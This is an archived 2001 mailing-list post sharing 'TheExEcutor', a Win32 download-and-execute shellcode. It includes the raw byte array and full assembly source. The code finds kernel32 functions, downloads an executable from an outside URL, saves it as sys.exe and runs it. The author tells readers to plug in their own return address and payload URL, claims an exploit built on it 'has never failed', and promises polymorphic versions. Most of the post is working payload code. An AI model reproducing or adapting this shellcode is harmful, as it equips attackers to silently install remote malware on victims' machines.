This is the 1st version of my download & execute code... it searches the EXPORT table of KERNEL32 at a given KERNEL BASE. This code is the smallest I've seen on its class... less than 300 bytes Can be even smaller? yes... Can be more optimized? yes... That will be done in future releases. The Class B of this shellcode will search for the functions in the **IMPORT** table at a given base.... for example, inetinfo.exe base is 1000000h, by looking at the import table there, you will never fail executing the shellcode, you'll get always the correct addresses =).... Also compression & polymorphism will be implemented. I created an exploit that uses classB.... has never failed. (scary) Attached to this message: The ASM code and a VC++ file to test the shellcode............. Note: you have to change the C++ file... put another EIP. the one i'm using is at shell 32 (call esp or jmp esp)... I'm using W2k sp1. Also, change the scode and include the url you want. unsigned char TheExEcutor[293] = { 0xEB, 0x67, 0x5E, 0x8B, 0xEC, 0x8B, 0x06, 0x66, 0x33, 0xC0, 0x8B, 0xD8, 0x03, 0x40, 0x3C, 0x8B, 0x40, 0x78, 0x03, 0xC3, 0x8B, 0x78, 0x20, 0x8D, 0x3C, 0x3B, 0x03, 0x1F, 0x33, 0xD2, 0x33, 0xC9, 0x43, 0x38, 0x13, 0x75, 0x01, 0x41, 0x81, 0x3B, 0x47, 0x65, 0x74, 0x50, 0x75, 0x0B, 0x81, 0x7B, 0x04, 0x72, 0x6F, 0x63, 0x41, 0x75, 0x02, 0x74, 0x02, 0xEB, 0xE5, 0x50, 0x41, 0x33, 0xC0, 0xB0, 0x04, 0xF7, 0xE1, 0x8B, 0xC8, 0x58, 0x03, 0xC1, 0x83, 0xC0, 0x24, 0xFF, 0x76, 0x02, 0x66, 0xFF, 0x30, 0x5B, 0x56, 0x83, 0xC6, 0x04, 0x46, 0x80, 0x3E, 0xFF, 0x75, 0x03, 0x80, 0x36, 0xFF, 0x81, 0x3E, 0x4B, 0x49, 0x4B, 0x45, 0x75, 0xEF, 0xEB, 0x02, 0xEB, 0x4B, 0x5E, 0x8B, 0xE5, 0x8B, 0x06, 0x66, 0x33, 0xC0, 0x50, 0x83, 0xC6, 0x04, 0x56, 0x50, 0xFF, 0xD3, 0x83, 0xC6, 0x0D, 0x56, 0xFF, 0xD0, 0x83, 0xC6, 0x07, 0x56, 0x50, 0xFF, 0xD3, 0x33, 0xC9, 0x51, 0x51, 0x83, 0xC6, 0x13, 0x56, 0x83, 0xC6, 0x1C, 0x56, 0x51, 0xFF, 0xD0, 0x58, 0x50, 0x83, 0xEE, 0x08, 0x56, 0x50, 0xFF, 0xD3, 0x33, 0xC9, 0x51, 0x83, 0xEE, 0x14, 0x56, 0xFF, 0xD0, 0x58, 0x83, 0xC6, 0x08, 0x56, 0x50, 0xFF, 0xD3, 0x33, 0xC9, 0x51, 0xFF, 0xD0, 0xE8, 0x47, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xE8, 0x77, 0x4C, 0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41, 0xFF, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0xFF, 0x55, 0x52, 0x4C, 0x44, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x54, 0x6F, 0x46, 0x69, 0x6C, 0x65, 0x41, 0xFF, 0x73, 0x79, 0x73, 0x2E, 0x65, 0x78, 0x65, 0xFF, 0x45, 0x78, 0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0xFF, 0x57, 0x69, 0x6E, 0x45, 0x78, 0x65, 0x63, 0xFF, "http://box.net/baby.exe", 0xFF, 0x4B, 0x49, 0x4B, 0x45, } ; NOTE: SUBSTITUTE THE URL WITH THE ONE YOU WANT, IE. "0x68, 0x74, 0x74, 0x70...." (HTTP...).... ; ; "TheExEcutor" Class A v1.0 - Win32 Shellcode ; ; Copyright (c) 2001 by Enrique A. Compań Gzz. ; ; Virtek Labs ; ; http://www.virtekweb.net/labs ; ; ; Downloads & Executes a file. It searches for function addresses ; automatically by looking at the EXPORT table of Kernel32 with a ; default Kernel base of 78e80000h. You can change this. ; .386 .model flat, stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc includelib \masm32\lib\kernel32.lib include \masm32\include\user32.inc includelib \masm32\lib\user32.lib .data data db "blah" .code shell_code_start: jmp fix_long_jmp ;Jump to call back function call_back: pop esi ;ESI = first var offset real_code_start: mov ebp, esp ;Normalize the stack mov eax, [esi] ;eax = ptr to "MZ" (Kernel Base) xor ax, ax mov ebx, eax ;ebx = ptr to "MZ" add eax, [eax+3ch] ;eax = ptr to "PE" mov eax, [eax+78h] ;eax = export tables RVA add eax, ebx ;eax = ptr to export tables mov edi, [eax+20h] ;edi = names tables RVA lea edi, [edi+ebx] ;edi = names table ptr ; Ex table = 77ed5c20 ; Names tables with RVAs of names = 77ed6f92 add ebx, [edi] xor edx, edx xor ecx, ecx search_function: inc ebx cmp [ebx], dl jne no_zero inc ecx no_zero: cmp [ebx], DWORD PTR 'PteG' jne no_match cmp [ebx+4], DWORD PTR 'Acor' jne no_match je search_complete no_match: jmp search_function search_complete: push eax inc ecx xor eax, eax mov al, 4 mul ecx mov ecx, eax pop eax add eax, ecx add eax, 024h push [esi+2] push word ptr [eax] pop ebx ;EBX = GetProcAddress address... finally! ; Decode the NULL chars push esi add esi, 4 decode_loop: inc esi cmp byte ptr [esi], 0ffh jne skip_xor xor byte ptr [esi], 0ffh skip_xor: cmp [esi], dword ptr 'EKIK' jne decode_loop ;Trick to avoid Nulls in the first jmp instruction... jmp skip_fix_long_jmp ;Skipt the special jump fix_long_jmp: jmp pi_offset ;Continue the jump to the call back function skip_fix_long_jmp: ;Now we Download & Execute the file and terminate pop esi mov esp, ebp ;Normalize ESP mov eax, [esi] ;eax = ptr to "MZ" (Kernel Base) xor ax, ax push eax add esi, 4 push esi push eax call ebx ;Call GetProcAddress add esi, 13 push esi call eax ;Call LoadLibraryA add esi, 7 push esi push eax call ebx ;Call GetProcAddress xor ecx, ecx push ecx push ecx add esi, 19 push esi add esi, 28 push esi push ecx ;Call URLDownloadToFileA call eax pop eax push eax sub esi, 8 push esi push eax call ebx ;Call GetProcAddress xor ecx, ecx push ecx sub esi, 20 push esi call eax ;Call WinExec pop eax add esi, 8 push esi push eax call ebx ;Call GetProcAddress xor ecx, ecx push ecx call eax ;Call ExitProcess real_code_end: pi_offset: call call_back ;Return and push the address of the vars vars_start: db 0ffh,0ffh,0e8h,077h ;Specify the Kernel Base @ 77e80000h db "LoadLibraryA",0ffh db "URLMON",0ffh db "URLDownloadToFileA",0ffh db "sys.exe",0ffh db "ExitProcess", 0ffh db "WinExec",0ffh db "http://box.net/baby.exe",0ffh ;The URL: Be sure to end it with 0ffh db "KIKE",0h ;Marker to know we reached the END end shell_code_start -------------- Wooh... that was long... See u....
This archive was generated by hypermail 2b30 : Sat Sep 08 2001 - 14:25:43 PDT